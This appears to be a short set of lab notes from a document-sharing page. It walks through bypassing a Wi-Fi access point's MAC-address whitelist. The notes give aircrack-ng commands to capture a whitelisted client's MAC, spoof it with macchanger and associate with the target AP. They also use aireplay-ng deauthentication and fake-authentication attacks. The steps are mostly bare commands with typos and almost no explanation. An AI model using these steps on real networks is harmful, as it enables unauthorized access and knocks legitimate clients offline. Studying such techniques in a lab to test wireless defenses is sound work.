You are on page 1of 1

monitor hidden whiltelist mac address

1.airodump-ng -c 11 -a --bssid 00:21:91:D2:8E:25 mon0.


eg:target ap:00:21:91:D2:8E:25; whiltelist station:60:FB:42:D5:E4:01
2.to change our mac add to whiltelist mac adds
ifconfig wlan0 down
macchanger m 60:FB:42:D5:E4:01 wlan0
ifconfig wlan0 up
3.to connect target ap
iwconfig wlan0 essid "Wireless_lab" channel 11
4.to verify our wireless adapter is assosiate with AP
iwconfig wlan0(check 2nd line Access point:00:21:91:D2:8E:25 ===>target AP )
if not associate the 2nd line will show like this access point : Not-Associated
aireplay-ng --ig -0 5 -a macadd_target -c client_associate_ap(optional) mon0
airepla-ng -0 0 -a mactarget mon0
aireplay-ng -1 5 -a macadd_target mon0

You might also like